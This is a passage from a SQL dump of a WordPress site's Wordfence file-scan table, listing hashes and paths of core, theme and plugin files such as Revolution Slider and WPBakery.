(0xbb40d4c506af34bae2a303d1a6294049, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_history_24px.svg', 0, 0x4080fe2eff021dd76a98cb9d463a6d66, 0x4080fe2eff021dd76a98cb9d463a6d66, 0x1d3729c4fd5ca8d0ce2a00641d752e69e254bb62cffca238e986bce29a4f5a5d, '', 0, '?'),
(0xbb74c6c53974eef35f8f6d46c71615cd, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_no_sim_24px.svg', 0, 0xe8720a6923f5f6129ada85559e8bcd1f, 0xe8720a6923f5f6129ada85559e8bcd1f, 0x025c4e0956cf5844f1f0cbfdd56bd159bda6b6a4633c95ceefcb0e8d039c5520, '', 0, '?'),
(0xbb7bf3bc106d834ba03b2f5ffda50785, 'wp-content/maintenance/assets/images/instagram.svg', 0, 0x9212911ca62ae65343474bfe3d2a9387, 0x9212911ca62ae65343474bfe3d2a9387, 0x2cec3fc219176e87ddde45336ae395e9b9adaadc83c6de594878645cf1210aef, '', 0, '?'),
(0xbb9273d8bd346adbb058049147b0c2a3, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_tagcloud.php', 0, 0x6e143ca2cda7ed73dd43a5976f47e676, 0x6e143ca2cda7ed73dd43a5976f47e676, 0x8b131432678b844cb01f7c08fdb7d39f1695cb96150697cc45a682b4f39bb61a, '', 0, '?'),
(0xbb9ad3f2cf5adc6cfc239c4b706a5151, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-google-maps.svg', 0, 0x913de90dbb5c6d318119786d3bf97541, 0x913de90dbb5c6d318119786d3bf97541, 0xf06ca521e133717e325fda69883c94f06edf0e57922371cfea8a5934ded8b497, '', 0, '?'),
(0xbbca36cb1af82369573f54fdf2e53dc2, 'wp-content/plugins/revslider/uninstall.php', 0, 0x5e3b5a4797b7aed05953b24e704b8927, 0x5e3b5a4797b7aed05953b24e704b8927, 0x6cf51106686ceeff55244d07d7628c1446f688bbf931497046301821d60d1b7f, '', 0, '?'),
(0xbbca7bfc5d5cd6b5ad09f4e864f3bbda, 'wp-admin/css/forms-rtl.min.css', 1, 0x00000000000000000000000000000000, 0xaf625d635badd366bc7f303a8dd31f8c, 0x704b85c807146aa1be4630c1e7f593410190d59443c119da7487ed6e7352b2d9, '', 0, '?'),
(0xbc128ee4ec0834e48674f1f5a0743e1a, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_leak_add_24px.svg', 0, 0x5da4760d229f1ad35338ba607efe7d0a, 0x5da4760d229f1ad35338ba607efe7d0a, 0xecdbf9522b676be706f3201e1199dca2b3f4470655b4841730aeb4d228ef1a98, '', 0, '?'),
(0xbc18acf0e0c4161fcdef22a652d1c59c, 'wp-includes/images/crystal/text.png', 1, 0x00000000000000000000000000000000, 0x90cc20d1b2aafc23be64ff2511e35bb5, 0x6e31f4c230b5e9a93c3bfd0a0294cd4970a2f67edc668f99c5e2a0b81ecfc77a, '', 0, '?'),
(0xbc21752f12afdf6e101f7d5b7ff74495, 'wp-content/themes/Impreza/framework/admin/js/grid-builder.js', 0, 0x1d00310daed267edd0e86936d0ec7ee9, 0x1d00310daed267edd0e86936d0ec7ee9, 0x420f5faed0dfbdb4ad5f81efa663205757b964d2bfd2a5728a827cf388da87d8, '', 0, '?'),
(0xbc2c12cbd3f1c373b39d36c0b42b139d, 'wp-content/plugins/js_composer/include/autoload/vendors/layerslider.php', 0, 0x796e822897dafc9e2e1be847d9177197, 0x796e822897dafc9e2e1be847d9177197, 0xe920692a65c8056c3c9c0f56275d6af335248a470e510888a7e816a9ab239956, '', 0, '?'),
(0xbc40c206dd3652cc08045275ad8f0634, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_thumbs_up_down_24px.svg', 0, 0x1502132fd1a20ad29be8cdd5facf06b8, 0x1502132fd1a20ad29be8cdd5facf06b8, 0xb83cfc7e23447b0219c56f9e9bcc91350a65afc8a8c98ec1cf82796caca6670d, '', 0, '?'),
(0xbc4fd8e4f59552bea6508333990dcdd1, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-contact-form-7.svg', 0, 0x0a15788021de52ac04a73b414a971656, 0x0a15788021de52ac04a73b414a971656, 0x103eabc25bdbeecb40b5a96bcdaaed58e01746337810c50ffc10deba68f667d7, '', 0, '?'),
(0xbc76259f7f948c53b45bbfccaaa3d1be, 'wp-includes/ms-functions.php', 1, 0x00000000000000000000000000000000, 0xf76b68e778e24234b835749f98bd8f70, 0xc6b84ae806f0a6387a898bbd3fda2068221d691e94919c26ccfa94909a8bb69e, '', 0, '?'),
(0xbc8ded955ebdae86c634789540fadcfe, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-idea02.svg', 0, 0xac9b193717d5ef5241129b2af7a16be2, 0xac9b193717d5ef5241129b2af7a16be2, 0x73791bd8ed5d1704c4cc0d8e6a783175ef05403c0dd7f1128e5405f0800ce546, '', 0, '?'),
(0xbcb382147c58256a677540e8434a884d, 'wp-includes/js/dist/vendor/react.js', 1, 0x00000000000000000000000000000000, 0xf4ea9307973c76798b7a18f1ddfa700f, 0x5f2fa30e11efb5718a410149a1d531c9480ab8dc29e611a6352fc69286ded934, '', 0, '?'),
(0xbcb38b4a8503be5f87b42bb1f203ab2c, 'wp-content/plugins/Ultimate_VC_Addons/admin/about.php', 0, 0xf14f57c28b3b2bc2f1fa62bc486c8ef8, 0xf14f57c28b3b2bc2f1fa62bc486c8ef8, 0x64fbc626474cc3eed53c4616581cab3866fa67878649ccec3fc8b84fc58d366a, '', 0, '?'),
(0xbcd6827804520b1661d1dbf9c79c8440, 'wp-includes/css/dist/editor/style-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x0da91195d40246d5b6db07d553261811, 0x02be76b350b0f684da829ed2be5d0f8e3a119bc6c6bcab332855afebb8537f93, '', 0, '?'),
(0xbce73df1ec9741bad8ade32e88f54f58, 'wp-content/themes/Impreza/config/style-schemes.php', 0, 0xcec085ab856e0e385233b93b5f3bcedc, 0xcec085ab856e0e385233b93b5f3bcedc, 0x5a8df097bde2aaebf00924db3030053af45240875754dedc022c93db2f9cada3, '', 0, '?'),
(0xbce95d810e8e224dd53c0cfc2d717c7f, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/strategy2.svg', 0, 0x50443e9c9d62eb3b3c3059475045cd4b, 0x50443e9c9d62eb3b3c3059475045cd4b, 0xb9b086f00edc0e0a50b4c03eb59e2c7bcea6a718c01681d220113b250a0315a7, '', 0, '?'),
(0xbced85f1908c7d7e653b216189879f95, 'wp-content/plugins/revslider/admin/assets/js/css_editor.js', 0, 0xd2ad3955d22ec9aca4ceb6ed63d016a0, 0xd2ad3955d22ec9aca4ceb6ed63d016a0, 0xc0bb8c369f99d4e4b8b3779a2a6cca9c26acfb011f2ae1ac5e133c98504ef536, '', 0, '?'),
(0xbcf09bc25822af2d7be3ca2434387378, 'wp-admin/css/deprecated-media.css', 1, 0x00000000000000000000000000000000, 0xbb1687b14f439591b839d9bbbb834166, 0xcbdbfe631b60d64cf00cf4ba48b23b8a63b4216b5bf74c2743624961a7ac6aaa, '', 0, '?'),
(0xbcfc55649fa513064d8592d95324806c, 'wp-admin/includes/class-wp-list-table-compat.php', 1, 0x00000000000000000000000000000000, 0x5d15f604cd5a3b9016e2170b45b08627, 0x3e15de3157fb55ed8622265349ab642ffadd42a01c74bbb32204beb29c551657, '', 0, '?'),
(0xbd0d7a7f8de940b35fc390fd6df8644d, 'wp-content/plugins/wordfence/modules/login-security/classes/model/ip.php', 1, 0x00000000000000000000000000000000, 0x8d391336bf66baf6aeee3b981ca18730, 0x6d676325d30c691a6e148341ae80428a40c09a7746b17a04db0c3be779600d4e, '', 0, '?'),
(0xbd2bae9c3c4fce8ed6470d5831c9c3f1, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-jwplayer.php', 0, 0xa1b6cdad06faa30d4bcfb5f4617927b0, 0xa1b6cdad06faa30d4bcfb5f4617927b0, 0x8b18c55542906c793a3ce072577a7866e597b11376d2d464a93dba8fef95206d, '', 0, '?'),
(0xbd3c013952b9aac75895c7520c4064f8, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_chrome_reader_mode_24px.svg', 0, 0x1e027e7f3dd0393c08493fc266fcc011, 0x1e027e7f3dd0393c08493fc266fcc011, 0x99ebd4d250f558246e828825aeeedee098572762c1b74b0ff149d72aed3e6bff, '', 0, '?'),
(0xbd40478415ee74c765598f5c273eaf4f, 'wp-content/plugins/wordfence/lib/wfVersionCheckController.php', 1, 0x00000000000000000000000000000000, 0x7e1a79a368025b2ac8fcfa5bc7a5ebb7, 0xd1710dc77ad5b9346be4c39bc5ed3eda8ca56ae2d3279bb624fd61395db20aa2, '', 0, '?'),
(0xbd5a079ec0571974c770a5084e8c680f, 'wp-admin/css/nav-menus.min.css', 1, 0x00000000000000000000000000000000, 0x8aaac8c45315f80ce0f534516d595f7f, 0x488c42da1357ae63aa9b8e0db2b38926625d0ccba6e6c025f9f95a6d2d3a7b91, '', 0, '?'),
(0xbd5f3a03b051e11a6fb2437d4586e748, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_off_24px.svg', 0, 0x30959e28a13d082afb4d0ee28fd50301, 0x30959e28a13d082afb4d0ee28fd50301, 0xbe3b3681cd346289416f9b9cd06fc638d7616e9acb72cb69c9e25b9ff1c3de68, '', 0, '?'),
(0xbd8346b6ba26b6ec3734a71a6f5874ff, 'wp-content/plugins/Ultimate_VC_Addons/admin/fonts/ultimate.svg', 0, 0xd22931e532553e2c0e419c50892055fa, 0xd22931e532553e2c0e419c50892055fa, 0xbbadf0e8fa0e426f58b90b2f8da7d278bb1f95436a5c49bacd31df26fd3673b2, '', 0, '?'),
(0xbd905a2012f8904f19670a578b579232, 'wp-includes/js/wp-embed-template.min.js', 1, 0x00000000000000000000000000000000, 0x133c315433779bc4804a93c209e7e023, 0x3e6931bf8d9e575074e812ff7858bdda4027aacd937741715a073200cd4ffa37, '', 0, '?'),
(0xbd94d921143474231c41ad42978281ef, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_backup_24px.svg', 0, 0xc266232ff7261b4d34adf8b9a199d596, 0xc266232ff7261b4d34adf8b9a199d596, 0x8fcdb39a4ac5b9f7326aecead0cc74f8b711ecf39836067d6157f3542553e14f, '', 0, '?'),
(0xbd9f67cdaebb8e426efb1f2aa5c30d34, 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-update-plugins.php', 1, 0x00000000000000000000000000000000, 0x761be5f7590e028ffc94309f03a57e5e, 0x7b214659cb038fba4cbdb8907f2ed1562e1adc127b2ba43bdf51dc99a95191b5, '', 0, '?'),
(0xbda3f49007415112876ea93c954554ac, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_2_24px.svg', 0, 0x1ad14ac7bd53e261182107de4e33255b, 0x1ad14ac7bd53e261182107de4e33255b, 0x741453a77b14d0409127919df2555bdab46fb06448859da7c8566d439ec6e3ec, '', 0, '?'),
(0xbdaf21dc683e18846971853874d5c26e, 'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php', 1, 0x00000000000000000000000000000000, 0xf600e7a413d93ef606a4405565ecec55, 0x18aec89b7003f1e204a1cb846f3cb8a74f0a01bc861f4f6f127bd6773d059753, '', 0, '?'),
(0xbdb2bc5c869339bad195810146a077ed, 'wp-admin/js/revisions.js', 1, 0x00000000000000000000000000000000, 0xc5f20aa2e318716cc3b6f539c9528dd5, 0x637cff360e830702c3eb0021a47f389481cfc961a535813f518dcbdb63d4d40b, '', 0, '?'),
(0xbdd7d0caf169574e0840b9f77a77401e, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hat-moustache.svg', 0, 0x5acd41893ee90306116bad26f8ca9856, 0x5acd41893ee90306116bad26f8ca9856, 0x97dc10f0b9fdc6389acfc3bd5cbb5e2787282beef207b7e57b9b7915e8b0a50d, '', 0, '?'),
(0xbde4467e1eedffeae9443bbda0422c8a, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_basic_grid_filter.php', 0, 0x0f0129df6f30f270fddc69482637f1db, 0x0f0129df6f30f270fddc69482637f1db, 0x9ad6419e473aa98256dbc6733504f96d0c3e525aa90806987bab109b3cb5a411, '', 0, '?'),
(0xbdf5dbe71432fa5c5c07d2d52895ee23, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_ondemand_video_24px.svg', 0, 0x3b0698cc84187239d6e10786ffb5a46e, 0x3b0698cc84187239d6e10786ffb5a46e, 0x1cb1e0c9c9e9ccc648722b30e08a4f14d8772362439644083d6d6bd28d277c97, '', 0, '?'),
(0xbdfaaf667188f0dff6f9dc69263aeba8, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_help_24px.svg', 0, 0xed27ed4a43716576a315ee7e6f51e5af, 0xed27ed4a43716576a315ee7e6f51e5af, 0xf10b88e20174880fa571f04f385c2e9490f7b2596cb9adc0bf61063c1695cdc6, '', 0, '?'),
(0xbe019a515c40c9892af884877fb6f16d, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_layers_clear_24px.svg', 0, 0x8e3f9668cac50b94bdaebec42d734abc, 0x8e3f9668cac50b94bdaebec42d734abc, 0x3225ed72dd3ffa35e2a1c99784391c25cbc48ff54cf8755fc64ba79fc0c70b09, '', 0, '?'),
(0xbe0222999c3a1f4001e33649f4e4fb4b, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-vc-logo.svg', 0, 0x8d99f74d2aef836d37d9f7dbec6db15b, 0x8d99f74d2aef836d37d9f7dbec6db15b, 0xdbf853e101f237cf6e5b6c0d70aa5b6b6430fb00ceff331004b91510e7fcd4c0, '', 0, '?'),
(0xbe027f5f5ae1259b118eadb51be5a808, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart07.svg', 0, 0x6f304cdc51b1d997de6393226e95c089, 0x6f304cdc51b1d997de6393226e95c089, 0x36bddb11805eb034ba4c27476f8d3830825e5104ab67ea25674c8de5d99b8a8f, '', 0, '?'),
(0xbe1448198443bfe9f8dafb8be6561fa7, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_interactive_banner_2.php', 0, 0x8ca1164b6193fa11edf7b5854123c9bd, 0x8ca1164b6193fa11edf7b5854123c9bd, 0x9c5099d1089e119e939f1753e320ed9890a12ca255261da0f37b79cd76f2383f, '', 0, '?'),
(0xbe2f3def2b486845d1de3134d3ca86a5, 'wp-content/plugins/wordfence/views/tours/login-security.php', 1, 0x00000000000000000000000000000000, 0xa323149c3f63611b6ed59053064b1a5e, 0x2f18dff9617e91e02da43279c1c85d790570cb21021759e89d85e8f4fa454b5f, '', 0, '?'),
(0xbe4af5ae23fa6a320d18977c541411b3, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_3_bar_24px.svg', 0, 0x1631b401a1b906f2de438c08bca7c5c9, 0x1631b401a1b906f2de438c08bca7c5c9, 0x8fbce25610e2ddd4f5c62b05f5fb6228ecc1a7b038824c25aeec0891c96d0a49, '', 0, '?'),
(0xbe5bb58019d5a7218688db69c2ee67dd, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_vertical_align_center_24px.svg', 0, 0x8fc68ad61fb764a360762b7b235424e9, 0x8fc68ad61fb764a360762b7b235424e9, 0x5088f3c036707d916d09bf66dab329817c1d29e70ed24eb5decf30832394f51b, '', 0, '?'),
(0xbe5ef1dde5c86846f6225f94d6986e6c, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_select_all_24px.svg', 0, 0xa1ed23f1a49f16dde1bf230598badf16, 0xa1ed23f1a49f16dde1bf230598badf16, 0x7c18116e82e89086e10f630b8fe58afd2a8e96121314bc43efc2e76d670006f9, '', 0, '?'),
(0xbe7f8b9357bb1313548f3c371e1d2059, 'wp-content/plugins/js_composer/include/classes/core/class-vc-sort.php', 0, 0x3677240618a541aab6cefe5979221e67, 0x3677240618a541aab6cefe5979221e67, 0x6cb5559b68dd48ea681372a0a2726dcc1851cf370754fe63dc2ac9610179e7ac, '', 0, '?'),
(0xbe8397f14e1ee9c4f5fe40bd28ba3397, 'wp-includes/ID3/module.audio.mp3.php', 1, 0x00000000000000000000000000000000, 0xcd78c0956e3d0926bf2d2900208cdb1a, 0xdbab8c951cbf102d6c30dc49e51337c73d683d8f225ab0c65f51169db336fd8e, '', 0, '?'),
(0xbe8a68a2dddf29554740c87896cc7609, 'wp-admin/edit-tags.php', 1, 0x00000000000000000000000000000000, 0x7dc416fc240fa44edd0a80e221899342, 0x827893bb865853cf574a7e25cf40cc2d0ec599bdf5b3569a4e5aa71593e48f7b, '', 0, '?'),
(0xbedd316e7d9b5098703362b657a815bf, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-uk.po', 1, 0x00000000000000000000000000000000, 0x6387a5f7e387fbe6ee9b719163930a48, 0x0acc3912dd9a06518245bfa13ab25c81a63f0d11963323ccb241ddccef3f9765, '', 0, '?'),
(0xbee132185d6871753ade543645d155b6, 'wp-content/plugins/wordfence/lib/wfAPI.php', 1, 0x00000000000000000000000000000000, 0x43781895337640bb885124296716d70d, 0x6b4268e9e61b6c25cddc9f08821b47c4ff613d522005198440a5ce9ef47b9aa7, '', 0, '?'),
(0xbee1e3cdda9714c7c9caa76656e2d3d9, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_2_bar_24px.svg', 0, 0x69cb34770c501009e739aab8ff0d2f9d, 0x69cb34770c501009e739aab8ff0d2f9d, 0x021e5e947705e22389612f279e3d20e8592dfc4b08e107479a018777c70eda99, '', 0, '?'),
(0xbf0f094965d3d4a95b47babcb35fc136, 'wp-includes/js/dist/editor.js', 1, 0x00000000000000000000000000000000, 0x60bfecc5cd647b68e7e6031fa539422c, 0xc50d9bfd2e859b76af069492cfa8ad248c1b38ad329bcb9faaae7510a0e8d98c, '', 0, '?'),
(0xbf23b24175490c2e46aaf92ff6a0c70f, 'wp-includes/js/wp-pointer.js', 1, 0x00000000000000000000000000000000, 0x7c3581af000bc58db4f8129ba6cd12b2, 0x97c22563496492e667c98371d34548dab060364514d3aa4548b7761d08862688, '', 0, '?'),
(0xbf2c332877d552f3476f106b1c018a98, 'wp-content/plugins/revslider/admin/assets/js/codemirror/codemirror.js', 0, 0x81682a84405442f32b7365b1d1a414f2, 0x81682a84405442f32b7365b1d1a414f2, 0x7747f47f4b16ec6bbccb88af1c64ab0e92d5dac05c9293376a6ba6dc865c875b, '', 0, '?'),
(0xbf40ea11c92cd0086e5c96809d2b6bb7, 'wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js', 1, 0x00000000000000000000000000000000, 0xd1ce7b53e26d646fdb640f194bcbc873, 0x7829b0fd45a88c8570084eac77bf6765ebac803c44f8a363fe854d63a7619201, '', 0, '?'),
(0xbf4acf1dffd3b06ae3631e9f8680c4c4, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/link.php', 0, 0x4f54fff81edc6c4550cb8866e4714db3, 0x4f54fff81edc6c4550cb8866e4714db3, 0x1b3d15345e36fddeffe9afb85acb671c03b18911aea23bd9c9ae4b38fe1e7a5d, '', 0, '?'),
(0xbf4f2fb411c3ac11ee607c67a8075f00, 'wp-includes/Requests/Exception/HTTP/429.php', 1, 0x00000000000000000000000000000000, 0x53f0dd257c04462ec3a05a6485b38fcc, 0x0ff4168b21f3115493ba0e751f776da17435c96f0acc3241226b94df9a7aad03, '', 0, '?'),
(0xbf76e997464997cb3268b4cff8a46ec1, 'wp-content/plugins/wordfence/readme.txt', 1, 0x00000000000000000000000000000000, 0xba9d910136f5f1f80e37b83e0f8b1122, 0x6bba46c5e2f0b0df81583a716b3c265e1d5f831bca59d76411f7f8e01f4f78fb, '', 0, '?'),
(0xbf7b8931f0fa22b806a65eeb01d2c82e, 'wp-includes/class-wp-widget-factory.php', 1, 0x00000000000000000000000000000000, 0x004c60e66be634c3a3a15142b48d6d73, 0x677eba9a0ad0927232de56c0766066cc4bb2c593875d97d2ed2e16ad5e2efcd7, '', 0, '?'),
(0xbf7f0837d90a1b9806a39f4cecfa9220, 'wp-content/plugins/revslider/admin/assets/js/rev_addon-admin.js', 0, 0x11ceb5714ba1f085d9eced45a3f4a4a1, 0x11ceb5714ba1f085d9eced45a3f4a4a1, 0x92520c4bc27712cb2fa6f27c88bd10ec5eb63d2469c44b93a8d3f47737803ac7, '', 0, '?'),
(0xbf997314bcf383499e71468d9b8aa3b5, 'wp-admin/includes/class-theme-installer-skin.php', 1, 0x00000000000000000000000000000000, 0x39b621a70c051c78b37e29f8990ba2ca, 0x94cbfd3f806da76ac8bfeb85b58d03e1d6cb46218ff0f1a659e3684d3a1e99dc, '', 0, '?'),
(0xbf99b83d563ba2178bededc24e2e4b07, 'wp-includes/js/wp-list-revisions.js', 1, 0x00000000000000000000000000000000, 0x5019624f50b503784fa5727337a9b532, 0x81230cb4f23b0c77b43104a381b02ea5cb42d5c6f0339513665f183bcf5066f7, '', 0, '?'),
(0xbfacdb4da53003022184c16667c3365c, 'wp-content/plugins/revslider/admin/views/rev_addon-admin-display.php', 0, 0xadc7bd5d1f9b3cca77e68d81daf85af9, 0xadc7bd5d1f9b3cca77e68d81daf85af9, 0xe694947436be44f1572191d7087e5bef1efb1c65504a99c7afe0db8298676457, '', 0, '?');
INSERT INTO `zdenl_wffilemods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES
(0xbfb70a1485d39b4951454409e6fcea89, 'wp-includes/class-wp-comment-query.php', 1, 0x00000000000000000000000000000000, 0xa739f275b885564c02eed29e37efb0e4, 0xc0fda2c3e7ed57b1d88c59c0c33a1d3971a74e35f8ce263a5292da58a9bfde44, '', 0, '?'),
(0xbfb8f7f25ce84d05bc4df8462fb11349, 'wp-includes/Requests/Auth/Basic.php', 1, 0x00000000000000000000000000000000, 0x67fdd878cc84df15093455d6096b2143, 0x2eded0b9680bdc64426948c980e06e9373b78288a2e19d978b5cb103def1f64f, '', 0, '?'),
(0xbfe0ce9a2ccc519861bb676cb7c41aaf, 'wp-includes/class-smtp.php', 1, 0x00000000000000000000000000000000, 0x654534b6c48e0219cd5a45898cad329e, 0x2da0dedf6339641ea76f2d9f71a6f2fca2db1fb9e9ef6d4a760850c133898994, '', 0, '?'),
(0xbfec4c1ae397c5117ca80f3d9a639989, 'wp-content/plugins/wordfence/modules/login-security/classes/controller/whitelist.php', 1, 0x00000000000000000000000000000000, 0x4230f5f71b999aec6f75918dcc8c1bc2, 0x8e9c87fc372f518ce3a5e5c690d59077ff673ac41e3fa1c0237b73fef0c99ffa, '', 0, '?'),
(0xbfff64411f2385f6cd2ae782c5b96f37, 'wp-admin/js/customize-controls.min.js', 1, 0x00000000000000000000000000000000, 0x4a48e911b20edfe9c2f9c52cd9ee6fe5, 0x295551c546fb07b88a97cbeb0eec7b3503127e3870286fc70612f2b1633a8c23, '', 0, '?'),
(0xc000fa805742984cd566e7f90d329508, 'wp-content/plugins/js_composer/assets/lib/bower/isotope/dist/isotope.pkgd.min.js', 0, 0x38fc018b2a3e21b4fc9d85c31055fbe1, 0x38fc018b2a3e21b4fc9d85c31055fbe1, 0xc41cb135f05f58389d924a04bcf38103092541e32d1e4a4f83c358d2b4d987d9, '', 0, '?'),
(0xc00877c21975ca2cb98971d8a1b80202, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/arrow-right.svg', 0, 0x049171e5aa916172d90300b98a3d9e31, 0x049171e5aa916172d90300b98a3d9e31, 0x5053c7bf461b8b1f5acae9f05d0566c6869e9be650851c18074ce595223a5960, '', 0, '?'),
(0xc012ce561a46c317d300e1cc1d8e7c80, 'wp-includes/sodium_compat/src/Core32/Poly1305.php', 1, 0x00000000000000000000000000000000, 0xdf404267e9c1bb454af8c6bd174811b6, 0x6901a7eda67c5c49a69703c706f19d144589918cc95f950bac58e7b6886a92d9, '', 0, '?'),
(0xc015abcd78cb4f570d83a0a80217a0c7, 'wp-includes/sodium_compat/src/PHP52/SplFixedArray.php', 1, 0x00000000000000000000000000000000, 0x1de2316096fa2df1f57083999431fdb1, 0x27b35694ed85040cd02bf7be7fda3ff7963c21b443b51ac6bed9dced5155dfa2, '', 0, '?'),
(0xc01d6f7e013518d7a55ca3d4beceee91, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_bluetooth_audio_24px.svg', 0, 0x630d3bb649cc8c1c8d15adb95ff382e1, 0x630d3bb649cc8c1c8d15adb95ff382e1, 0x3e54560a05437e38994c4fc98107d9d05989764bcbb69e194465bbac13278925, '', 0, '?'),
(0xc01ef63c87628e669b6c7ed6241e51c6, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_plus_one_24px.svg', 0, 0xa7a36116dac41277dea6b8de69bc1c48, 0xa7a36116dac41277dea6b8de69bc1c48, 0x0dbef51809d7170ba8664c920860fb2a3a4e428b04212a87c20c94f433670167, '', 0, '?'),
(0xc03511da9ca0199ac732cf146c327b84, 'wp-admin/js/widgets/media-video-widget.js', 1, 0x00000000000000000000000000000000, 0x94f76a64411630ce10e215e74e518f47, 0x543ec9fa7a92fb53cc649c161e639b91fa2aa6125cac50cc0c9aa908c9ad8f7b, '', 0, '?'),
(0xc036fb3e12a6215e609e1331059bf362, 'wp-content/plugins/js_composer/include/templates/params/column_offset/template.tpl.php', 0, 0x0fdbd12306f322065eebf915629557d5, 0x0fdbd12306f322065eebf915629557d5, 0x78b4e390b505d19fdd9eaad1ffb938e705e4800c37fe54a31a0e073eb95bfbda, '', 0, '?'),
(0xc0440388ff210c56442b93f311eaeb14, 'wp-content/plugins/wordfence/views/scanner/scan-type.php', 1, 0x00000000000000000000000000000000, 0x5f5a62c5348b10b8daabf7fe2aa30c07, 0xc4772e00d3df2f2206a6d36be07ab67648513673263eba604bbbaa528343c2f2, '', 0, '?'),
(0xc0563626909582463147c6d4fbca23f6, 'wp-content/themes/Impreza/config/envato.php', 0, 0xd5f676d7e9f8b56ebfca7f95a6f4c4df, 0xd5f676d7e9f8b56ebfca7f95a6f4c4df, 0x6b135d481bbe095485f5c9acb1540c588ac5751457cfc9035f05d44fcdf46ef0, '', 0, '?'),
(0xc07abb36d9d92bf0d4dc50480da67455, 'wp-includes/css/dist/block-library/style.css', 1, 0x00000000000000000000000000000000, 0xf8b102ddba5cb08cc9cca1f8761edc68, 0x24f0cd462aca2f6f325f565a1d9554e01fc54a628510e29920008d3aeffd5a77, '', 0, '?'),
(0xc0818dcba5ccb04d56d0970c65aa41fa, 'wp-admin/js/widgets/media-video-widget.min.js', 1, 0x00000000000000000000000000000000, 0x186734538503669929e8d152100c2696, 0xc7405a7fc7275fe1272c6630df1c270dcae14abbcbec0e46fb7d436056d46295, '', 0, '?'),
(0xc08d9874a615e5281b8b696c7416592f, 'wp-includes/css/dist/list-reusable-blocks/style.css', 1, 0x00000000000000000000000000000000, 0x51e05fb6e2cd8020f046629e1d214bdd, 0x5e02d485e36e1291f81fe787353aba20991c548a07fc7945181a767f44471304, '', 0, '?'),
(0xc0b133221dfc0c287ad9618034ee388c, 'wp-includes/images/media/code.png', 1, 0x00000000000000000000000000000000, 0x2d6f96130cad55ca9310eed555a9555f, 0x27654d0620615b52231871329ad76b7aad2b2a0e3c81fcc4fcf7d13700deca6a, '', 0, '?'),
(0xc0c6cefbfa6dba01d07bb740af6d12df, 'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fChc-AMP6lbBP.woff', 1, 0x00000000000000000000000000000000, 0x186f4c46ca9234e5bc05d569ee0e2d2d, 0xc187a6436323315fbb9c7ccb1db75a201120bf8831188097c9bedcd5cf5978ed, '', 0, '?'),
(0xc0c8e0df6d34163f07d128501b72697d, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-compass.svg', 0, 0x83d1574135e4739e58a78b950b26ab7a, 0x83d1574135e4739e58a78b950b26ab7a, 0x9f999aba3c83cee30af955ee10b01010dc52fb960a7257d4de88875afe58c495, '', 0, '?'),
(0xc0faeafbc6d2c91df70466015db3a001, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/charts/vc_line_chart.js', 0, 0xd40fd15954a66d0b5d7ebd0809f11ca4, 0xd40fd15954a66d0b5d7ebd0809f11ca4, 0x68883757d7f4f6916cccbd34b8277872ae7003aa66e0f95f94d5d68824dc2336, '', 0, '?'),
(0xc103de88d27cb30785fea0bf2e58a714, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/NewTux.svg', 0, 0x216d387732238dc8f9f589cdabd6183d, 0x216d387732238dc8f9f589cdabd6183d, 0x16ef06b6d6f1fe945dc71f0341824eb25928246e558e5b93b0d7fde28b7f3084, '', 0, '?'),
(0xc1053aba1be5ab4a5b9a78c2afe323a2, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/admin/js/select2.js', 0, 0x5c707b49b737e534e38e54aee1e329c4, 0x5c707b49b737e534e38e54aee1e329c4, 0x047e120a6e52f0d607ee716632438f547f9498a47b479a1d370b94587fc9ae7c, '', 0, '?'),
(0xc1117e5194d4811cc5b4044670ecdbcd, 'wp-includes/class-wp-taxonomy.php', 1, 0x00000000000000000000000000000000, 0xdcd01b69a9a9f08f0cd27af9a80ab6cb, 0x69a0fe0e87a721032dbe2401f8067215b24b862dea423f9eefb6dadb6b1c1ae3, '', 0, '?'),
